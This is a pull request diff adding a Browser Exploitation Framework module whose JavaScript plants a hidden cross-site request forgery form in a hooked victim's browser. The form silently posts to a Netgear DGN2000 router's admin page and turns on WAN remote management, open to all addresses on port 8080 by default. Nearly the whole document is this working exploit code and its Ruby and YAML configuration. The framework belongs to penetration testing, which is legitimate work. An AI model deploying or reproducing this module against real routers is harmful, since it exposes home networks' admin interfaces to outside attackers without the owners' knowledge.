Merge pull request #1370 from nstarke/branches/netgear-dgn2000

Adding Netgear DGN2000 WAN Remote Management CSRF Module

modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/command.js

@@ -0,0 +1,103 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var base = '<%= @base %>';
+	var sourceip = '<%= @sourceip %>';
+  var port = '<%= @port %>';
+  var acl = sourceip != '0.0.0.0' ? 'ip_address_list1' : 'all';
+  var parts = [];
+  if (sourceip != '0.0.0.0'){
+    parts = sourceip.split('.');
+  }
+
+	var netgear_iframe = beef.dom.createIframeXsrfForm(base, 'POST', 'application/x-www-form-urlencoded', [
+    { type: 'hidden', name: 'remote_mg', value: 'remote_mg' },
+    { type: 'hidden', name: 'rm_ip1', value: '' },
+    { type: 'hidden', name: 'rm_ip2', value: '' },
+    { type: 'hidden', name: 'rm_ip3', value: '' },
+    { type: 'hidden', name: 'rm_ip4', value: '' },
+    { type: 'hidden', name: 'rm_start_ip1', value: '' },
+    { type: 'hidden', name: 'rm_start_ip2', value: '' },
+    { type: 'hidden', name: 'rm_start_ip3', value: '' },
+    { type: 'hidden', name: 'rm_start_ip4', value: '' },
+    { type: 'hidden', name: 'rm_finish_ip1', value: '' },
+    { type: 'hidden', name: 'rm_finish_ip2', value: '' },
+    { type: 'hidden', name: 'rm_finish_ip3', value: '' },
+    { type: 'hidden', name: 'rm_finish_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip1_ip1', value: parts.length === 4 ? parts[0] : '' },
+    { type: 'hidden', name: 'rm_list1_ip1_ip2', value: parts.length === 4 ? parts[1] : '' },
+    { type: 'hidden', name: 'rm_list1_ip1_ip3', value: parts.lentgh === 4 ? parts[2] : '' },
+    { type: 'hidden', name: 'rm_list1_ip1_ip4', value: parts.length === 4 ? parts[3] : '' },
+    { type: 'hidden', name: 'rm_list1_ip2_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip2_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip2_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip2_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip3_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip3_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip3_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip3_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip4_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip4_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip4_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip4_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip5_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip5_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip5_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip5_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip6_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip6_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip6_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip6_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip7_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip7_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip7_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip7_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip8_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip8_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip8_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip8_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip9_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip9_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip9_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip9_ip4', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip10_ip1', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip10_ip2', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip10_ip3', value: '' },
+    { type: 'hidden', name: 'rm_list1_ip10_ip4', value: '' },
+    { type: 'hidden', name: 'rm_access', value: acl },
+    { type: 'hidden', name: 'remote_port', value: port },
+    { type: 'hidden', name: 'apply', value: 'Apply' },
+    { type: 'hidden', name: 'todo', value: 'save' },
+    { type: 'hidden', name: 'this_file', value: 'remotemg.htm' },
+    { type: 'hidden', name: 'next_file', value: 'remotemg.htm' },
+    { type: 'hidden', name: 'c4_rm_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_start_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_finish_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip1_ip', value: sourceip },
+    { type: 'hidden', name: 'c4_rm_list1_ip2_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip3_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip4_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip5_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip6_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip7_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip8_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip9_ip', value: '' },
+    { type: 'hidden', name: 'c4_rm_list1_ip10_ip', value: '' },
+    { type: 'hidden', name: 'h_remote_mg', value: 'enable' },
+    { type: 'hidden', name: 'h_rm_access', value: acl }
+  ]);
+
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
+
+	cleanup = function() {
+		document.body.removeChild(netgear_iframe);
+	}
+
+	setTimeout('cleanup()', 15000);
+
+});
+

modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Netgear_dgn_2000_wan_mgmt_csrf:
+            enable: true
+            category: [ "Exploits", "Router" ]
+            name: "Netgear DGN 2000 WAN Remote Management"
+            description: "Attempts to enable remote management of the router on the WAN"
+            authors: ["Nick Starke"]
+            target:
+                working: ["ALL"]

modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Netgear_dgn_2000_wan_mgmt_csrf < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Router URL', 'value' => 'http://192.168.0.1'},
+			{ 'name' => 'port', 'ui_label' => 'Port', 'value' => 8080},
+			{ 'name' => 'sourceip', 'ui_label' => 'Source IP', 'value' => '0.0.0.0'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end